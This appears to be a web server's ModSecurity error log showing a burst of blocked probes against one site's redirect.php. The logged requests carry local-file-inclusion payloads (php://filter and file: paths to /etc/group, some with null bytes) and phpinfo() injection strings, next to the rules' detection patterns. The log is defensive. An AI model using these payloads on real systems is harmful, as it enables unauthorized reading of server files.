[Tue May 12 05:36:45.712079 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.712338 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizeziheQAAAFY"]
[Tue May 12 05:36:45.949656 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihegAAAFY"]
[Tue May 12 05:36:45.949787 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihegAAAFY"]
[Tue May 12 05:36:45.950319 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihegAAAFY"]
[Tue May 12 05:36:45.950554 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTdr1yOh9TvizezihegAAAFY"]
[Tue May 12 05:36:46.187784 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihewAAAFY"]
[Tue May 12 05:36:46.187837 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihewAAAFY"]
[Tue May 12 05:36:46.188068 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihewAAAFY"]
[Tue May 12 05:36:46.188182 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/resource=/etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihewAAAFY"]
[Tue May 12 05:36:46.188692 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihewAAAFY"]
[Tue May 12 05:36:46.188949 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihewAAAFY"]
[Tue May 12 05:36:46.426501 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: file:/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfAAAAFY"]
[Tue May 12 05:36:46.427107 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfAAAAFY"]
[Tue May 12 05:36:46.427342 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfAAAAFY"]
[Tue May 12 05:36:46.664549 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfQAAAFY"]
[Tue May 12 05:36:46.664599 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfQAAAFY"]
[Tue May 12 05:36:46.664810 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: file:/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfQAAAFY"]
[Tue May 12 05:36:46.665387 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfQAAAFY"]
[Tue May 12 05:36:46.665617 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfQAAAFY"]
[Tue May 12 05:36:46.902991 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfgAAAFY"]
[Tue May 12 05:36:46.903119 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfgAAAFY"]
[Tue May 12 05:36:46.903661 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfgAAAFY"]
[Tue May 12 05:36:46.903882 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgTtr1yOh9TvizezihfgAAAFY"]
[Tue May 12 05:36:47.140939 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihfwAAAFY"]
[Tue May 12 05:36:47.140983 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihfwAAAFY"]
[Tue May 12 05:36:47.141172 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihfwAAAFY"]
[Tue May 12 05:36:47.141280 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/read=string.rot13/resource=/etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihfwAAAFY"]
[Tue May 12 05:36:47.141810 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihfwAAAFY"]
[Tue May 12 05:36:47.142048 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihfwAAAFY"]
[Tue May 12 05:36:47.379372 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo();phpinfo();phpinfo() found within ARGS:url: phpinfo();phpinfo();phpinfo();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihgAAAAFY"]
[Tue May 12 05:36:47.379881 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihgAAAAFY"]
[Tue May 12 05:36:47.380108 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihgAAAAFY"]
[Tue May 12 05:36:47.617845 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo();phpinfo() found within ARGS:url: phpinfo();phpinfo();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihggAAAFY"]
[Tue May 12 05:36:47.618391 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihggAAAFY"]
[Tue May 12 05:36:47.618648 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihggAAAFY"]
[Tue May 12 05:36:47.855854 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo()|phpinfo() found within ARGS:url: phpinfo()|phpinfo()"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihgwAAAFY"]
